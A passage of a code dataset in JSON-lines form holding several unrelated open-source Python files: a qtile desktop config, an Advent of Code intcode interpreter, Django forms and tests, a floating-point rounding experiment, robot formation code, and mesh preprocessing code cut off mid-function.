widget, hook, qtile\nfrom libqtile.config import Click, Drag, Group, Key, Screen, Match, ScratchPad, DropDown\nfrom libqtile.lazy import lazy\nfrom libqtile.log_utils import logger\n\n\nmod = \"mod4\"\nterminal = \"alacritty\"\nlauncher = \"rofi -show run\"\nwallpaper_folder = \"/home/michael/Pictures/backgrounds\"\n\nColor = {\n \"base000\": \"#21252C\",\n \"base00\": \"#282c34\",\n \"base01\": \"#353b45\",\n \"base02\": \"#3e4451\",\n \"base03\": \"#545862\",\n \"base04\": \"#565c64\",\n \"base05\": \"#abb2bf\",\n \"base06\": \"#b6bdca\",\n \"base07\": \"#c8ccd4\",\n \"light_red\": \"#e06c75\",\n \"dark_yellow\": \"#d19a66\",\n \"yellow\": \"#e5c07b\",\n \"green\": \"#98c379\",\n \"cyan\": \"#56b6c2\",\n \"blue\": \"#61afef\",\n \"violet\": \"#c678dd\",\n \"red\": \"#be5046\",\n}\n\n\ndef debug_log(qtile):\n pass\n\n\ndef get_wallpaper():\n list_of_wallpapers = os.listdir(wallpaper_folder)\n wallpaper = random.choice(list_of_wallpapers)\n wallpaper = f\"{wallpaper_folder}/{wallpaper}\"\n return wallpaper\n\n\nkeys = [\n # Switch between windows\n Key([mod], \"j\", lazy.layout.left(), desc=\"Move focus to left\"),\n Key([mod], \"p\", lazy.layout.right(), desc=\"Move focus to right\"),\n Key([mod], \"k\", lazy.layout.down(), desc=\"Move focus down\"),\n Key([mod], \"l\", lazy.layout.up(), desc=\"Move focus up\"),\n # Move windows between left/right columns or move up/down in current stack.\n Key(\n [mod, \"shift\"],\n \"j\",\n lazy.layout.shuffle_left(),\n desc=\"Move window to the left\",\n ),\n Key(\n [mod, \"shift\"],\n \"p\",\n lazy.layout.shuffle_right(),\n desc=\"Move window to the right\",\n ),\n Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_down(), desc=\"Move window down\"),\n Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n # Switch window focus to other pane(s) of stack\n Key(\n [mod],\n \"Tab\",\n lazy.layout.next(),\n desc=\"Switch window focus to other pane(s) of stack\",\n ),\n # Toggle between different layouts as defined below\n Key([mod], \"a\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n # Kill window\n Key([mod], \"q\", lazy.window.kill(), desc=\"Kill focused window\"),\n # Restart/Shutdown qtile\n Key([mod, \"control\"], \"r\", lazy.restart(), desc=\"Restart Qtile\"),\n Key([mod, \"control\"], \"q\", lazy.shutdown(), desc=\"Shutdown qtile\"),\n Key([mod, \"control\"], \"t\", lazy.function(debug_log), desc=\"Debug logging key\"),\n # Key(\n # [mod, \"control\"],\n # \"w\",\n # lazy.function(change_wallpaper),\n # desc=\"Change Wallpaper\"\n # ),\n # Spawn\n Key(\n [mod],\n \"space\",\n lazy.spawn(launcher),\n desc=\"Spawn a command using a prompt widget\",\n ),\n Key([mod], \"Return\", lazy.spawn(terminal), desc=\"Launch terminal\"),\n Key(\n [mod, \"shift\"],\n \"Return\",\n lazy.spawn(\"alacritty -e tmux new\"),\n # lazy.spawn(\"alacritty -e tmux new-window -t TMUX: & tmux attach -t TMUX\"),\n desc=\"Launch terminal\",\n ),\n Key([mod], \"f\", lazy.window.toggle_floating(), desc=\"Toggle floating\"),\n # Sount Output change\n Key(\n [mod, \"control\"],\n \"a\",\n lazy.spawn(\n \"/home/michael/scripts/sound-output.sh wireless_headphone\",\n ),\n desc=\"Change sound to wireless headphone\",\n ),\n Key(\n [mod, \"control\"],\n \"s\",\n lazy.spawn(\"/home/michael/scripts/sound-output.sh headphone\"),\n desc=\"Change sound to headphone\",\n ),\n Key(\n [mod, \"control\"],\n \"d\",\n lazy.spawn(\n \"/home/michael/scripts/sound-output.sh loudspeaker\",\n ),\n desc=\"Change sound to loudspeaker\",\n ),\n Key([], \"XF86AudioNext\", lazy.spawn(\"playerctl -p spotify next\")),\n Key([], \"XF86AudioPlay\", lazy.spawn(\"playerctl -p spotify play-pause\")),\n]\n\n# Clamp groups to specified screen.\ndef go_to_group(qtile, group_name, screen):\n qtile.focus_screen(screen)\n qtile.groups_map[group_name].cmd_toscreen(toggle=False)\n\n\nworkspaces = [\n {\"name\": \"1\"},\n {\"name\": \"2\"},\n {\"name\": \"3\", \"spawn\": \"spotify\", \"matches\": [Match(wm_class=\"spotify\")]},\n {\"name\": \"4\"},\n {\"name\": \"5\"},\n {\"name\": \"6\"},\n {\"name\": \"7\"},\n {\"name\": \"8\"},\n {\"name\": \"9\"},\n {\"name\": \"0\", \"screen\": 1},\n]\n\ngroups = []\nfor workspace in workspaces:\n matches = workspace[\"matches\"] if \"matches\" in workspace else None\n screen = workspace[\"screen\"] if \"screen\" in workspace else 0\n spawn = workspace[\"spawn\"] if \"spawn\" in workspace else None\n ws_name = workspace[\"name\"]\n # screen_affinity sounds like specifying a screen but doesn't work\n groups.append(Group(ws_name, matches=matches, spawn=spawn, screen_affinity=screen))\n keys.append(Key([mod], ws_name, lazy.function(go_to_group, ws_name, screen)))\n # keys.append(Key([mod], ws_name, lazy.group[ws_name].toscreen()))\n keys.append(Key([mod, \"shift\"], ws_name, lazy.window.togroup(ws_name)))\n\n\nlayouts = [\n layout.Max(name=\"\"),\n layout.MonadTall(\n name=\"\",\n margin=15,\n border_width=3,\n border_focus=Color[\"blue\"],\n border_normal=Color[\"base01\"],\n ),\n]\n\nwidget_defaults = dict(font=\"Inter\", fontsize=14, padding=3, foreground=Color[\"base07\"])\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n top=bar.Bar(\n [\n widget.CurrentLayout(\n fmt=\"<big>{}</big>\",\n fontsize=24,\n padding=10,\n ),\n widget.GroupBox(\n font=\"Inter\",\n active=Color[\"base07\"],\n inactive=Color[\"base07\"],\n highlight_method=\"block\",\n block_highlight_text_color=Color[\"base00\"],\n rounded=False,\n other_screen_border=Color[\"blue\"],\n other_current_screen_border=Color[\"blue\"],\n this_current_screen_border=Color[\"blue\"],\n urgent_alert_method=\"block\",\n urgent_text=Color[\"base07\"],\n urgent_border=Color[\"red\"],\n hide_unused=True,\n disable_drag=True,\n ),\n widget.Spacer(),\n widget.StatusNotifier(),\n widget.Clock(\n format=\"%Y-%m-%d %a %H:%M\",\n ),\n ],\n 28,\n background=Color[\"base000\"],\n ),\n wallpaper=get_wallpaper(),\n wallpaper_mode=\"fill\",\n ),\n Screen(wallpaper=get_wallpaper(), wallpaper_mode=\"fill\"),\n]\n\n# Drag floating layouts.\nmouse = [\n Drag(\n [mod],\n \"Button1\",\n lazy.window.set_position_floating(),\n start=lazy.window.get_position(),\n ),\n Drag(\n [mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()\n ),\n Click([mod], \"Button2\", lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: List\nmain = None\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *layout.Floating.default_float_rules,\n Match(\n title=\"Library\", wm_class=\"firefox\"\n ), # Firefox Downloads, History, Bookmark manager window\n Match(wm_class=\"confirm\"),\n Match(wm_class=\"dialog\"),\n Match(wm_class=\"download\"),\n Match(wm_class=\"error\"),\n Match(wm_class=\"file_progress\"),\n Match(wm_class=\"notification\"),\n Match(wm_class=\"splash\"),\n Match(wm_class=\"toolbar\"),\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ],\n margin=15,\n border_width=3,\n border_focus=Color[\"blue\"],\n border_normal=Color[\"base01\"],\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nwmname = \"LG3D\"\n\n# TODO: This gets ugly. There is probably a better way to do it.\n@hook.subscribe.client_new\ndef new_client(new_window):\n current_group = qtile.current_group\n if current_group.name == \"1\" and current_group.windows:\n if (\n \"firefox\" in current_group.windows[0].get_wm_class()\n and \"firefox\" in new_window.get_wm_class()\n and new_window.name\n != \"Library\" # firefox Downloads/Bookmarks/History manager window\n and new_window.get_wm_role() != \"Dialog\"\n and new_window.get_wm_role() != \"GtkFileChooserDialog\"\n ):\n new_window.togroup(\"0\")\n\n\n# If we don't focus group['0'] at the start, qtile will put group['2'] on the second monitor\n# For some reason I can't call my already defined lazy_function above\n# needs import: from libqtile import qtile\n@hook.subscribe.startup_complete\ndef start_finished():\n qtile.focus_screen(1)\n qtile.groups_map[\"0\"].cmd_toscreen(toggle=False)\n qtile.focus_screen(0)\n qtile.groups_map[\"1\"].cmd_toscreen(toggle=False)\n\n\n@hook.subscribe.startup_once\ndef autostart():\n home = os.path.expanduser(\"~\")\n subprocess.Popen([home + \"/.config/qtile/autostart.sh\"])\n","repo_name":"michael-oti/dotfiles","sub_path":".config/qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"45170881291","text":"# https://adventofcode.com/2019/day/5\n\nimport os\n\nSCRIPT_DIR = os.path.dirname(__file__)\nINPUT_FILENAME = 'inputs.txt'\n\nCODES = {\n 'ADD': 1,\n 'MULTI': 2,\n 'INPUT': 3,\n 'OUTPUT': 4,\n 'JUMP_IF_TRUE': 5,\n 'JUMP_IF_FALSE': 6,\n 'LESS_THAN': 7,\n 'EQUALS': 8,\n 'EXIT': 99,\n}\nPOSITION_MODE = 0\nIMMEDIATE_MODE = 1\nLOG_IDX = -1\n\ndef get_inputs(dir, filename):\n file = os.path.join(dir, filename)\n inputs = []\n\n with open(file, 'r') as f:\n inputs = f.read().splitlines()\n\n return inputs[0].split(',')\n\ndef get_program_values(i, inputs, params):\n if len(params) == 0 or int(params[0]) == POSITION_MODE:\n val1 = inputs[int(inputs[i+1])]\n else:\n val1 = inputs[i+1]\n\n if len(params) <= 1 or int(params[1]) == POSITION_MODE:\n val2 = inputs[int(inputs[i+2])]\n else:\n val2 = inputs[i+2]\n\n return [int(val1), int(val2)]\n\ndef intcode(intcode_input, inputs):\n inputs_copy = inputs.copy()\n outputs = []\n\n total_inputs = len(inputs_copy)\n i = 0\n while i < total_inputs:\n input_program = list(str(inputs_copy[i]))\n optcode = int(''.join(input_program[-2:]))\n params = input_program[0:-2]\n params.reverse()\n\n if (optcode not in CODES.values()) or (optcode == CODES['EXIT']):\n break\n\n if optcode == CODES['INPUT']:\n inputs_copy[int(inputs_copy[i+1])] = intcode_input\n step = 2\n i += step\n continue\n\n elif optcode == CODES['OUTPUT']:\n if len(params) == 0 or int(params[0]) == POSITION_MODE:\n output = inputs_copy[int(inputs_copy[i+1])]\n else:\n output = inputs_copy[i+1]\n\n output = int(output)\n outputs.append(output)\n step = 2\n i += step\n continue\n\n elif optcode in [CODES['ADD'], CODES['MULTI'], CODES['LESS_THAN'], CODES['EQUALS']]:\n val1, val2 = get_program_values(i, inputs_copy, params)\n\n if optcode == CODES['ADD']:\n output = val1 + val2\n elif optcode == CODES['MULTI']:\n output = val1 * val2\n elif optcode == CODES['LESS_THAN']:\n if val1 < val2:\n output = 1\n else:\n output = 0\n elif optcode == CODES['EQUALS']:\n if val1 == val2:\n output = 1\n else:\n output = 0\n\n output_idx = int(inputs_copy[i+3])\n inputs_copy[output_idx] = output\n step = 4\n i += step\n continue\n\n elif optcode in [CODES['JUMP_IF_TRUE'], CODES['JUMP_IF_FALSE']]:\n val1, val2 = get_program_values(i, inputs_copy, params)\n\n if optcode == CODES['JUMP_IF_TRUE'] and val1 != 0:\n i = val2\n elif optcode == CODES['JUMP_IF_FALSE'] and val1 == 0:\n i = val2\n else:\n i += 3\n\n else:\n print('UNKNOWN OPTCODE!!!', i, 'input_program', input_program,\n 'optcode', optcode, 'params', params)\n\n return outputs\n\ndef main():\n inputs = get_inputs(SCRIPT_DIR, INPUT_FILENAME)\n answer = intcode(5, inputs)\n print(f'answer:', answer)\n\nmain()\n","repo_name":"thalida/adventofcode","sub_path":"2019/day-5/part-2--basic/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43587514839","text":"from django import forms\nfrom .models import News, Image\nfrom tinymce.widgets import TinyMCE\nfrom django.contrib.admin.widgets import AdminDateWidget\n\n\nTITLE_LENGTH_ERROR = \"This title lenght is too long, Please make sure title characters are 200 characters or less.\"\nTITLE_EMPTY_ERROR = \"You'll have to add a title.\"\nTEXT_EMPTY_ERROR = \"Please enter the content of the news.\"\nNO_CATEGORY_ERROR = \"Please select a author category.\"\n\n\nclass NewsForm(forms.ModelForm):\n title = forms.CharField(\n label='Title',\n widget=forms.TextInput(\n attrs={'placeholder': 'Enter the suitable title for the article'})\n )\n content = forms.CharField(widget=TinyMCE(\n attrs={'cols': 50, 'rows': 15}), error_messages={\n 'required': TEXT_EMPTY_ERROR\n })\n\n class Meta:\n model = News\n fields = ['title', 'content', 'created_date', 'status']\n widgets = {\n 'created_date': forms.DateInput(format=('%d-%m-%Y'), attrs={'firstDay': 1, 'pattern=': '\\d{4}-\\d{2}-\\d{2}', 'format': 'yyyy-mm-dd', 'type': 'date'}),\n }\n\n\nclass NewsAdminForm(forms.ModelForm):\n title = forms.CharField(\n label='Title',\n widget=forms.TextInput(\n attrs={'placeholder': 'Enter the suitable title for the article'})\n )\n content = forms.CharField(widget=TinyMCE(\n attrs={'cols': 50, 'rows': 15}), error_messages={\n 'required': TEXT_EMPTY_ERROR\n })\n created_date = forms.DateField(widget=AdminDateWidget())\n\n class Meta:\n model = News\n fields = ['title', 'content', 'created_date', 'status']\n widgets = {\n 'created_date': forms.DateInput(format=('%d-%m-%Y'), attrs={'firstDay': 1, 'pattern=': '\\d{4}-\\d{2}-\\d{2}', 'format': 'yyyy-mm-dd', 'type': 'date'}),\n }\n\n\nclass ImageForm(forms.ModelForm):\n image = forms.FileField(\n required=False, widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n class Meta:\n model = Image\n fields = (\n 'image',\n )\n","repo_name":"archesnep/danam52b","sub_path":"danam/danam/newsforms.py","file_name":"newsforms.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70728835574","text":"# logistic_function_rmode.py: ロジスティック写像(丸め誤差評価付き)\r\nimport rmode # 丸めモード変更\r\n\r\n# デフォルトモード(RN)\r\nrmode.print_rmode()\r\nx_rn = [0.7501] # 初期値を配列の先頭値に格納\r\n\r\n# x[i+1]に値を追加\r\nfor i in range(0, 100):\r\n x_rn.append(4 * x_rn[i] * (1 - x_rn[i]))\r\n\r\n# RPモード\r\nrmode.set_rmode(rmode.FE_UPWARD)\r\nrmode.print_rmode()\r\nx_rp = [0.7501] # 初期値を配列の先頭値に格納\r\n\r\n# x[i+1]に値を追加\r\nfor i in range(0, 100):\r\n x_rp.append(4 * x_rp[i] * (1 - x_rp[i]))\r\n\r\n# RMモード\r\nrmode.set_rmode(rmode.FE_DOWNWARD)\r\nrmode.print_rmode()\r\nx_rm = [0.7501] # 初期値を配列の先頭値に格納\r\n\r\n# x[i+1]に値を追加\r\nfor i in range(0, 100):\r\n x_rm.append(4 * x_rm[i] * (1 - x_rm[i]))\r\n\r\n# diff_rn_rm, diff_rn_rp, diff_rp_rm\r\nrel_diff_rn_rm = [abs((x_rn[i] - x_rm[i]) / x_rn[i]) for i in range(len(x_rn))]\r\nrel_diff_rn_rp = [abs((x_rn[i] - x_rp[i]) / x_rn[i]) for i in range(len(x_rn))]\r\nrel_diff_rm_rp = [abs((x_rm[i] - x_rp[i]) / x_rn[i]) for i in range(len(x_rn))]\r\nmax_rel_diff = [\r\n max(\r\n rel_diff_rn_rm[i],\r\n rel_diff_rn_rp[i],\r\n rel_diff_rm_rp[i]\r\n ) for i in range(len(x_rn))\r\n]\r\n\r\n# x[0], x[10], ..., x[100]を表示\r\nprint(' i, x_rm[i] , x_rn[i] , x_rp[i] ,max_rel_diff')\r\nfor i in range(0, 101):\r\n if i % 10 == 0:\r\n print(f'{i:5d}, {x_rm[i]:25.17e}, {x_rn[i]:25.17e}, {x_rp[i]:25.17e}, {max_rel_diff[i]:5.1e}')\r\n\r\n\r\n# -------------------------------------\r\n# Copyright (c) 2021 Tomonori Kouya\r\n# All rights reserved.\r\n# -------------------------------------\r\n","repo_name":"tkouya/inapy","sub_path":"chapter04/logistic_function_rmode.py","file_name":"logistic_function_rmode.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"8721114811","text":"#!/usr/bin/env python3\n\ndef div(n, q=0):\n if n == 1:\n return q,n\n elif n == 0:\n return q,n\n else:\n q += 1\n return div(n//2, q)\n\n\ndef nearest(n):\n ''' given input n\n find the nearest power\n of 2 closest to n\n '''\n # q is the number of time n was divided by 2\n # repeatedly until we get either 1 or 0\n q,r = div(n)\n if r == 1:\n return 2**(q+1)\n else:\n return 2**q\n\n\nif __name__ == \"__main__\":\n print(nearest(129))\n\n","repo_name":"adypd97/merkeltree","sub_path":"test/powoftwo.py","file_name":"powoftwo.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33119355715","text":"from django.test import TestCase\nfrom django.utils import timezone\n\nfrom .models import Blog, Entry, Author, Comment\n\n# Create your tests here.\n\nclass BlogTests(TestCase):\n def test_all_tests(self):\n # delete all the data from all the models\n Comment.objects.all().delete()\n Entry.objects.all().delete()\n Author.objects.all().delete()\n Blog.objects.all().delete()\n # populate with some data\n now = timezone.now()\n b = Blog(name = \"Lissun ruokablogi\", tagline=\"Parasta ruokaa 2018\")\n b.save()\n author_lissu = Author(name=\"Lissu Sörsseli\",email=\"lissu@kokki.com\")\n author_lissu.save()\n author_jaana = Author(name=\"Jaana Jämäpuoli\",email=\"jaana@kyokki.com\")\n author_jaana.save()\n author_kalle = Author(name=\"Kalle Kädetön\", email=\"enosaa@muutakaan.com\")\n author_kalle.save()\n entry_kakku = Entry(blog=b, headline=\"Maailman helpoin kakku\",\n body_text=\"tarvitset vain jauhoa, sokeria ja munaa\")\n entry_kakku.save() # must save before you can ManyToManyFields\n entry_kakku.authors.add(author_lissu) # ManyToManyFields are added\n entry_kakku.authors.add(author_jaana)\n comment = Comment(entry=entry_kakku, text=\"Todella hyvä\")\n comment.save()\n comment = Comment(entry=entry_kakku, text=\"Ihan paras\")\n comment.save()\n entry_pulla = Entry(blog=b, headline=\"Nopeat pullat\", \n body_text=\"Pistä kaupan valmiit jäiset pullaan uuniin ja +200 C, 10 min\")\n entry_pulla.save()\n entry_pulla.authors.add(author_lissu)\n comment = Comment(entry=entry_pulla, text=\"Supernopea!\")\n comment.save()\n b2 = Blog(name=\"Kallen sotkut\", tagline=\"Äijien safkaa\")\n b2.save()\n entry_pizza = Entry(blog=b2, headline=\"Äijäpizza\",\n body_text=\"ÄLÄ säästele missään raaka-aineissa\")\n entry_pizza.save()\n entry_pizza.authors.add(author_kalle)\n comment = Comment(entry=entry_pizza, text=\"ei tätä pysty syömään\")\n comment.save()\n comment = Comment(entry=entry_pizza, text=\"Kerrankin kunnon mättöä!\")\n comment.save()\n # let's do some queries\n # I know these should be asserts, but I am too lazy :)\n print(\"How many authors kakku entry has\")\n kakku = Entry.objects.get(headline__contains=\"kakku\") # get finds single\n print(kakku.authors.count())\n print(\"All blog entries made by Lissu by publishing date order\")\n entries = Entry.objects.filter(authors__name=\"Lissu Sörsseli\").order_by('pub_date')\n print(entries)\n print(\"All blog entries made by Lissu by reverse publishing date order\")\n entries = Entry.objects.filter(authors__name=\"Lissu Sörsseli\").order_by('-pub_date')\n print(entries)\n print(\"All comments:\")\n comments = Comment.objects.all()\n print(comments)\n print(\"Comments to Lissu's blog entries\")\n comments = Comment.objects.filter(entry__authors__name=\"Lissu Sörsseli\")\n print(comments)\n \n","repo_name":"hamk-webdev-18a/petrikuittinen_django","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27013698710","text":"import numpy as np\nfrom copy import copy\nfrom numpy import array\nfrom numpy import trapz\n\nfrom utils.utils import connect, distance\n\nclass Trajectory:\n def __init__(self, coords):\n self.start = coords[0]\n self.end = coords[1]\n self.line = connect(array([[self.start[0], self.start[1]],\n [self.end[0], self.end[1]]]))\n\n\n # Calculate at the end of train episode\n def compute_total_traj_disruption(self, robot_history):\n robot_history = array(robot_history)\n robot_history_sorted = robot_history[robot_history[:, 1].argsort()]\n x_robot = []\n y_robot = []\n for point in robot_history_sorted:\n if point[0] == 0 and point[1]==0: continue\n x_robot.append(point[0] - self.start[0])\n y_robot.append(-1*(point[1] - self.start[1]))\n robot_area = trapz(x=x_robot, y=y_robot)\n return abs(robot_area)\n\n\n\nclass Formation:\n def __init__(self, name, robots, ids):\n self.robots = robots\n self.ids = ids\n if name == \"triangle\": self.formation = self._triangle_formation()\n elif name == \"line\": self.formation = self._line_formation()\n elif name == \"square\": self.formation = self._square_formation()\n # self.formation final look:\n # [[(200, 100), (700, 100)], [(250, 100), (750, 100)], [(225, 150), (725, 150)]]\n self.end_middle_coordinate = self._compute_end_point()\n self.dists = {}\n self.assign_trajs()\n self.assign_dists()\n\n def _triangle_formation(self):\n start = [(50, 100), (50, 150), (93, 125)]\n end = list(map(lambda coords: (coords[0]+500, coords[1]), start))\n return [[x,y] for x,y in zip(start, end)]\n\n def _line_formation(self):\n start = [(200, 100), (200, 130), (200, 160)]\n end = list(map(lambda coords: (coords[0]+500, coords[1]), start))\n return [[x, y] for x, y in zip(start, end)]\n \n def _square_formation(self):\n start = [(200, 100), (200, 130), (230, 130), (230,100)]\n end = list(map(lambda coords: (coords[0]+500, coords[1]), start))\n return [[x, y] for x, y in zip(start, end)]\n\n def assign_trajs(self):\n \"\"\" Assigns desired trajectory to each robot, respectively.\n \"\"\"\n for robot, formation_coords in zip(self.robots, self.formation):\n traj = Trajectory(formation_coords)\n robot.trajectory = traj # [(start),(end)]\n robot.x, robot.y = traj.start\n \n # def get_goal_distances(self):\n # start = [x[0] for x in self.formation]\n # return {(0,1): (abs(start[0][0]-start[1][0]), abs(start[0][1]-start[1][1])),\n # (0,2): (abs(start[0][0]-start[2][0]), abs(start[0][1]-start[2][1])),\n # (1,2): (abs(start[2][0]-start[1][0]), abs(start[2][1]-start[1][1]))}\n\n def assign_dists(self):\n \"\"\" For each robot in the swarm, assigns the desired distance to mantain \n with respects to every other robot in the swarm.\n \"\"\"\n starts = [x[0] for x in self.formation]\n for robot in self.robots:\n robot.distances = {}\n robot.distances_log = {}\n for id, entry in enumerate(starts):\n if id == robot.id:\n continue\n else:\n dist = distance(robot.position, entry)\n self.dists[(robot.id, id)] = dist\n robot.distances[id] = (abs(dist))\n robot.distances_log[id] = [(abs(dist))]\n\n def get_distances(self) -> dict:\n \"\"\" Gets current distances between robots.\n \"\"\"\n dists = {}\n for robot in self.robots:\n new_ids = copy(self.ids)\n new_ids.remove(robot.id)\n for id in new_ids:\n dists[robot.id] = dict.fromkeys(new_ids, robot.distances_log[id][-1])\n return dists\n\n def _compute_end_point(self):\n # [[(200, 100), (700, 100)], [(250, 100), (750, 100)], [(225, 150), (725, 150)]]\n all_ends = [start_and_end[1] for start_and_end in self.formation]\n ends_x = [end[0] for end in all_ends]\n ends_y = [end[1] for end in all_ends]\n return (sum(ends_x)/len(ends_x), sum(ends_y)/len(ends_y))\n\n def dist_to_end_poit(self):\n return [distance(robot.position, self.end_middle_coordinate) for robot in self.robots]\n","repo_name":"MicImbriani/thesis_robotics","sub_path":"base/formation.py","file_name":"formation.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8702026656","text":"#Setting up the mesh\n#1. Create V, T (mesh shape)\n#2. Figure out muscle fiber directions U\n#\t- harmonic function gradient\n#\t- heat\n#3. Get modes\n#5. Rotation clusters using K-means clustering on modes\n#6. BBW for skinning meshes. One handle per rotation cluster.\n\nimport numpy as np\nimport math\nfrom collections import defaultdict\nfrom sets import Set\nimport datetime\nimport json\nimport scipy\nfrom scipy.optimize import minimize\nfrom scipy.spatial import Delaunay\nfrom scipy import sparse\n\nimport random\nimport sys, os\nimport cProfile\nsys.path.insert(0, os.getcwd()+\"/../../libigl/python/\")\nimport pyigl as igl\nfrom Helpers import *\nfrom Mesh import Mesh\nnp.set_printoptions(threshold=\"nan\", linewidth=190, precision=8, formatter={'all': lambda x:'{:2.3f}'.format(x)})\nfrom iglhelpers import *\nimport json\n\n\nclass Preprocessing:\n\n\tdef __init__(self, _VT=None, modes_used=None):\n\t\tself.middle_button_down = False\n\t\tif _VT is not None:\n\t\t\tself.V = _VT[\"V\"]\n\t\t\tself.T = _VT[\"T\"]\n\n\t\t\tself.U = np.zeros(len(self.T))\n\t\t\tself.Fix = []# get_max(self.V, a=1, eps=1e-2)\t\t\n\t\t\tself.Mov = []#get_min(self.V, a=1, eps=1e-2)\n\t\t\tself.gi = 0\n\t\t\tself.mesh = None\n\t\t\tself.uvec = None\n\t\t\tself.eGu = None\n\t\t\tself.uClusters = []\n\t\t\tself.uClusterNum = -1\n\t\t\tself.modes_used = modes_used\n\t\tself.UVECS = None\n\n\tdef save_mesh_setup(self, name=None):\n\t\t#SAVE: V, T, Fixed points, Moving points,Eigs, EigV \n\t\t# Muscle clusters, Rotation clusters, Skinning Handles, \n\t\t# Maybe ARAP pre-processing info\n\n\t\t#AND json file with basic info\n\t\t# - mesh folder name (so ARAP pre-processing can potentially be saved)\n\t\t# - sizes, YM, poisson, muscle strengths, density\n\t\tif name is None:\n\t\t\tname = str(datetime.datetime.now())\n\t\t\tos.makedirs(\"./MeshSetups/\"+name)\n\t\tfolder = \"./MeshSetups/\"+name+\"/\"\n\t\tprint(\"writing DMATS to \"+folder)\n\t\tif self.mesh is not None:\n\t\t\tigl.writeDMAT(folder+\"V.dmat\", igl.eigen.MatrixXd(np.array(self.mesh.V)), True)\n\t\t\tigl.writeDMAT(folder+\"F.dmat\", igl.eigen.MatrixXi(self.mesh.T), True)\n\t\t\tigl.writeDMAT(folder+\"FixV.dmat\", igl.eigen.MatrixXi(np.array([self.mesh.fixed], dtype='int32')), True)\n\t\t\tigl.writeDMAT(folder+\"MovV.dmat\", igl.eigen.MatrixXi(np.array([self.mesh.mov], dtype='int32')), True)\n\t\t\tigl.writeDMAT(folder+\"Uvec.dmat\", igl.eigen.MatrixXd(np.array([self.mesh.u])), True)\n\n\t\t\tif self.mesh.Q is not None:\n\t\t\t\tigl.writeDMAT(folder+\"Modes.dmat\", igl.eigen.MatrixXd(self.mesh.Q), True)\n\t\t\t\t# igl.writeDMAT(folder+\"Eigs.dmat\")\n\t\t\tif self.mesh.r_element_cluster_map is not None:\n\t\t\t\tigl.writeDMAT(folder+\"Rclusters.dmat\", igl.eigen.MatrixXi(self.mesh.r_element_cluster_map), True)\n\t\t\tif self.mesh.s_handles_ind is not None:\n\t\t\t\tigl.writeDMAT(folder+\"SHandles.dmat\", igl.eigen.MatrixXi(np.array([self.mesh.s_handles_ind], dtype='int32')), True)\n\t\t\tif self.mesh.u_clusters_element_map is not None:\n\t\t\t\tfor i in range(len(self.mesh.u_clusters_element_map)):\n\t\t\t\t\tigl.writeDMAT(folder+\"uClusters\"+str(i)+\".dmat\", igl.eigen.MatrixXi(np.array([self.mesh.u_clusters_element_map[i]])), True)\n\n\t\t\tdata = {\"uClusters\": len(self.mesh.u_clusters_element_map)}\n\t\t\twith open(folder+\"params.json\", 'w') as outfile:\n\t\t\t\tjson.dump(data, outfile)\n\n\t\tprint(\"Done writing DMAT\")\n\n\tdef read_mesh_setup(self, name=None, modes_used=None):\n\t\tif name==None:\n\t\t\tprint(\"Name can't be none.\")\n\t\t\texit()\n\t\telse:\n\t\t\tfolder = \"./MeshSetups/\"+name+\"/\"\n\t\t\tjdata = json.load(open(folder+\"params.json\"))\n\t\t\tlen_uClusters = jdata['uClusters']\n\t\t\tprint(\"READING DMATs from \"+folder)\n\t\t\teV = igl.eigen.MatrixXd()\n\t\t\teT = igl.eigen.MatrixXi()\n\t\t\teu = igl.eigen.MatrixXd()\n\t\t\teQ = igl.eigen.MatrixXd()\n\t\t\tefix = igl.eigen.MatrixXi()\n\t\t\temov = igl.eigen.MatrixXi()\n\t\t\tes_ind = igl.eigen.MatrixXi()\n\t\t\ter_ind = igl.eigen.MatrixXi()\n\t\t\tu_ind = []\n\t\t\teu_ind = igl.eigen.MatrixXi()\n\n\t\t\tigl.readDMAT(folder+\"V.dmat\", eV)\n\t\t\tigl.readDMAT(folder+\"F.dmat\", eT)\n\t\t\tigl.readDMAT(folder+\"Uvec.dmat\", eu)\n\t\t\tigl.readDMAT(folder+\"Modes.dmat\", eQ)\n\t\t\tigl.readDMAT(folder+\"FixV.dmat\", efix)\n\t\t\tigl.readDMAT(folder+\"MovV.dmat\", emov)\n\t\t\tigl.readDMAT(folder+\"Rclusters.dmat\", er_ind)\n\t\t\tigl.readDMAT(folder+\"SHandles.dmat\", es_ind)\n\t\t\tfor i in range(len_uClusters):\n\t\t\t\tigl.readDMAT(folder+\"uClusters\"+str(i)+\".dmat\", 